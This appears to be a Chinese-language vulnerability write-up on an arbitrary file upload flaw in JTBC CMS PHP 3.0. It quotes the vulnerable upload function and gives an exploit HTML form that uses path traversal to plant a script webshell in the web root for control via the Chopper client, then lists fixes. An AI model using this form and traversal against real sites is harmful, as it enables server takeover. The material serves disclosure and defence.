0x00 环境准备
JTBC(CMS)官网:http://www.jtbc.cn
网站源码版本:JTBC_CMS_PHP(3.0) 企业版
程序源码下载:http://download.jtbc.cn/php/3.0/PHP_JTBC_CMS.C.zip
测试网站首页:
0x01 代码分析
1、漏洞文件位置:/console/file/common/incfiles/manage.inc.php 第212-241行:
- public static function moduleActionAddFile()
- {
- $tmpstr = '';
- $status = 0;
- $message = '';
- $path = base::getString(request::get('path'));
- $pathRoot = smart::getActualRoute('./');
- $account = self::account();
- if (!$account -> checkPopedom(self::getPara('genre'), 'add'))
- 10. {
- 11. $message = tpl::take('::console.text-tips-error-403', 'lng');
- 12. }
- 13. else
- 14. {
- 15. if (is_dir($path))
- 16. {
- 17. $myPath = base::getLRStr($path, $pathRoot, 'rightr');
- 18. $filename = @$_FILES['file']['name'];
- 19. $tmp_filename = @$_FILES['file']['tmp_name'];
- 20. $newfilepath = $path . self::ppSetFolderAndFileName($filename);
- 21. if (move_uploaded_file($tmp_filename, $newfilepath))
- 22. {
- 23. $status = 1;
- 24. $account -> creatAutoLog('manage.log-addfile-1', array('path' => $myPath . $filename));
- 25. }
- 26. }
- 27. }
- 28. $tmpstr = self::formatMsgResult($status, $message);
- 29. return $tmpstr;
30. }
这段代码中,获取path参数,拼接成完整路径,然后将文件上传到服务器。
并没有对文件类型进行过滤,导致程序在实现上存在任意文件上传漏洞,攻击者可以通过上传脚本木马,控制服务器权限。
0x02 漏洞利用
1、登录网站后台,然后构造Form表单:
- <form enctype="multipart/form-data" action="http://127.0.0.1/console/file/manage.php?type=action&action=addfile&path=../.././" method="post">
- Upload a new file:<br>
- <input type="file" name="file" size="50"><br>
- <input type="submit" value="Upload">
- </form>
2、成功上传脚本木马到网站根目录,且文件名未进行重命名
3、通过url访问脚本木马地址,执行脚本代码
4、通过菜刀连接,成功控制网站服务器
0x03 修复建议
1、通过白名单限制上传文件后缀
2、禁止上传目录脚本执行权限。
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
